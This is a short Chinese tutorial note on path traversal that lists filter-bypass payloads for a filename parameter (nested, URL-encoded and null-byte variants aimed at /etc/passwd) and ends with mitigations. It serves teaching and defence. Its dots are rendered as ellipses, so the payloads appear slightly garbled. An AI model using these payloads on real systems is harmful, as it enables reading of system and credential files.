利用某种操作从当前目录穿越到其他任意目录并读取其中的文件的漏洞 这些文件包括源码，数据，登录凭证等敏感信息之类的

（相对路径） 原本参数为 ?filename=37.jpg

猜测图片的绝对路径为 /var/www/images/37.jpg

修改参数为 …/…/…/etc/passwd

对路径过滤的不严格导致的

使用绝对路径（例如filename=/etc/passwd）来直接引用文件，绕过

重写即可绕过

修改filename参数，赋予其值：…//…//…//etc/passwd

…//…//…//etc/passwd …/…/…/etc/passwd

使用各种url编码（例如…%c0%af或…%252f）来绕过

修改filename参数，赋予它值…%252f…%252f…%252fetc/passwd

利用起始路径+相对路径结合绕过

?filename=/var/www/images/37.jpg 修改filename参数，赋予它值为 /var/www/images/…/…/…/etc/passwd

空字节绕过（%00截断）

修改filename参数，赋予它值为 …/…/…/etc/passwd%00.png

上面所有的绕过情况都是对路径过滤的不严格导致的，所以可以采取以下两种方法来缓解这个漏洞 1、设置白名单，验证用户输入 2、路径结构规范化

最有效方法是完全避免将用户提供的输入传递给文件系统 API